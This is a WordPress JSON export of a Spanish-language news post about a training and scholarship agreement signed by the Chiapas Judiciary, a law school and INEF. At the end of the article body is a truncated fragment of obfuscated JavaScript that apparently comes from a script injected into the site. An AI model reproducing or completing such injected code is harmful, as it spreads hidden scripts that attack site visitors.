{"id":20981,"date":"2025-03-20T03:20:36","date_gmt":"2025-03-20T03:20:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20981"},"modified":"2025-03-20T03:20:37","modified_gmt":"2025-03-20T03:20:37","slug":"con-capacitacion-y-profesionalizacion-se-fortalece-la-cultura-de-paz-juan-carlos-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20981","title":{"rendered":"Con capacitaci\u00f3n y profesionalizaci\u00f3n se fortalece la cultura de paz: Juan Carlos Moreno Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"20982\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0017-1024x683.jpg\" alt=\"\" class=\"wp-image-20982\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0017-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0017-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0017-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0017-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0017-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"20983\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0019-1024x683.jpg\" alt=\"\" class=\"wp-image-20983\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0019-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0019-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0019-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0019-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0019-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"688\" data-id=\"20984\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0018-1024x688.jpg\" alt=\"\" class=\"wp-image-20984\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0018-1024x688.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0018-300x202.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0018-768x516.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0018-1536x1032.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0018-2048x1376.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250319-WA0018-110x75.jpg 110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>-Firma convenio Poder Judicial, la Facultad de Libre Derecho de Chiapas y el Instituto Nacional de Estudios Fiscales (INEF)<\/p>\n\n\n\n<p>19 de marzo del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado de Chiapas comprometido con la capacitaci\u00f3n y actualizaci\u00f3n, firm\u00f3 un convenio con la Facultad de Libre Derecho de Chiapas (Fldch) y el Instituto Nacional de Estudios Fiscales (INEF), que permitir\u00e1 obtener becas para cursar maestr\u00edas a las y los servidores de esta casa de la justicia, as\u00ed como la realizaci\u00f3n de pr\u00e1cticas profesionales a las y los alumnos de Derecho.<\/p>\n\n\n\n<p>Durante esta firma, el magistrado presidente Juan Carlos Moreno Guill\u00e9n exhort\u00f3 a las y los beneficiarios de este convenio a seguir capacit\u00e1ndose y adquirir las herramientas necesarias que permitan desarrollarse de la mejor manera en el \u00e1mbito laboral, y realizarse como mejores seres humanos, para fortalecer y abonar en la cultura de paz en nuestra entidad.<\/p>\n\n\n\n<p>\u201cEn el Poder Judicial estamos conscientes de que la capacitaci\u00f3n y la profesionalizaci\u00f3n son factores importantes para lograr optimizar la administraci\u00f3n e impartici\u00f3n de una justicia m\u00e1s humanista, donde las y los juzgadores sean verdaderos agentes de justicia y de paz\u201d, manifest\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Este convenio es un esfuerzo interinstitucional para fortalecer la formaci\u00f3n acad\u00e9mica y profesional en el \u00e1mbito jur\u00eddico, contando con perfiles m\u00e1s especializados que refuercen la administraci\u00f3n e impartici\u00f3n de una justicia m\u00e1s humanista.<\/p>\n\n\n\n<p>Asimismo, el rector de la Fldch, Gabriel Enrique Bravo del Carpio, reconoci\u00f3 al Poder Judicial y a su presidente por su disponibilidad para fomentar el estudio, los conocimientos y la experiencia laboral y profesional, herramientas fundamentales que las y los estudiantes tendr\u00e1n para desempe\u00f1arse en el \u00e1mbito legal.<\/p>\n\n\n\n<p>En este acto estuvieron presentes personalidades jurisdiccionales y administrativas del Poder Judicial que participaron en la realizaci\u00f3n de este convenio, as\u00ed como directivos y estudiantes del INEF.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. -Firma convenio Poder Judicial, la Facultad de Libre Derecho de Chiapas y el Instituto Nacional de Estudios Fiscales (INEF) 19 de marzo del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado de Chiapas comprometido con la capacitaci\u00f3n y actualizaci\u00f3n, firm\u00f3 un convenio con la Facultad de Libre Derecho de Chiapas (Fldch) y el Instituto &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20984,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20981","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20981","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20981"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20981\/revisions"}],"predecessor-version":[{"id":20985,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20981\/revisions\/20985"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20984"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20981"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20981"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20981"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}